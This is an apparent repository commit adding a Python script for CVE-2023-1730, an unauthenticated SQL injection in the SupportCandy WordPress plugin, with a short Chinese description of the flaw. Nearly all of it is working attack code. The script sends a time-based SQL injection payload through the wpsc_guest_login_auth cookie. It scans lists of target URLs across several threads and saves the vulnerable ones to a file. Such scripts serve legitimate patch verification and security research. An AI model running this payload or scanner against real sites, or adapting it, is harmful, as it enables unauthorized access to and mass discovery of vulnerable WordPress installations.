WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730

VulnExpo · web-flow · commit e6912ac6e986 · 2023-11-16T17:47:40.000+08:00
3.1.5之前的SupportCandy WordPress插件在SQL语句中使用用户输入之前不会验证和转义用户输入，这可能允许未经身份验证的攻击者执行SQL注入攻击。
diff --git a/WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py b/WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py
@@ -0,0 +1,76 @@
+# 作者: VulnExpo
+# 日期: 2023-11-16
+
+import requests
+import argparse
+import threading
+import time
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def check_for_vulnerability(url, proxies=None, success_file=None):
+	try:
+		headers = {'Cookie': 'wpsc_guest_login_auth={"email":"\' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}'}
+
+		# 检查响应时间
+		start_time = time.time()
+		response = requests.get(url, headers=headers, proxies=proxies, verify=False)
+		end_time = time.time()
+		duration = end_time - start_time
+
+		if response.status_code == 200 and "supportcandy" in response.text and duration >= 6:
+			print(f"目标URL: {url}")
+			with open(success_file, 'a') as s_file:
+				s_file.write(f"++++++++++++++++++\n")
+				s_file.write(f"目标URL: {url}\n")
+				s_file.write(f"响应内容: 响应时间：{duration} 秒\n\n")
+			return True
+	except Exception as e:
+		print(f"发生异常：{e}")
+		return False
+
+def scan_targets(targets, proxies=None, success_file=None):
+	for target in targets:
+		target = target.strip()
+		check_for_vulnerability(target, proxies, success_file)
+
+def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
+	threads = []
+
+	for i in range(num_threads):
+		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
+		threads.append(thread)
+
+	for thread in threads:
+		thread.start()
+
+	for thread in threads:
+		thread.join()
+
+if __name__ == '__main__':
+	parser = argparse.ArgumentParser(description="WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730")
+	parser.add_argument("-u", "--url", help="目标URL")
+	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
+	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
+	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
+	args = parser.parse_args()
+
+	if not args.url and not args.file:
+		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
+		exit(1)
+
+	if args.url:
+		urls = [args.url]
+	elif args.file:
+		with open(args.file, 'r') as file:
+			urls = file.readlines()
+
+	success_file = 'success_targets.txt'
+
+	proxies = {
+		"http": args.proxy,
+		"https": args.proxy
+	} if args.proxy else None
+
+	multi_threaded_scan(urls, proxies, success_file, args.threads)
+
+	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
